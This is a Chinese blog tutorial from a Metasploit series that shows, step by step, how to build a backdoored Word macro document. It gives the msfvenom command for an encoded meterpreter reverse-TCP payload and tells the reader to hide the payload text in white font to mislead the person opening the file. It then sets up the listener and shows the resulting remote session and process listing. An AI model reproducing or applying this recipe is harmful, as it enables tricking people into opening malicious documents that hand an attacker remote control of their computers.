Metasploit实例-宏漏洞(九)

1.1.1 使用office宏获取shell

1.1.1.1 生成宏后门

# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

图片[1]|Metasploit实例-宏漏洞(九)|leon的博客

图片[2]|Metasploit实例-宏漏洞(九)|leon的博客

1.1.1.2 制作带后门的宏文档

图片[3]|Metasploit实例-宏漏洞(九)|leon的博客

复制第一段代码到编辑器中:

图片[4]|Metasploit实例-宏漏洞(九)|leon的博客

复制第二段代码payload到word正文:

图片[5]|Metasploit实例-宏漏洞(九)|leon的博客

将字体设置为白色,增加迷惑性:

图片[6]|Metasploit实例-宏漏洞(九)|leon的博客

另存为启用宏的word文档:

图片[7]|Metasploit实例-宏漏洞(九)|leon的博客

1.1.1.3 启动msf监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > run –j

1.1.1.4 打开文档测试连接

图片[8]|Metasploit实例-宏漏洞(九)|leon的博客

msf6 exploit(multi/handler) > sessions

图片[9]|Metasploit实例-宏漏洞(九)|leon的博客

msf6 exploit(multi/handler) > sessions -i 1
# 查看后门进程
meterpreter > getpid
Current pid: 2224
meterpreter > ps

图片[10]|Metasploit实例-宏漏洞(九)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:31,已超过455天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/3032.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享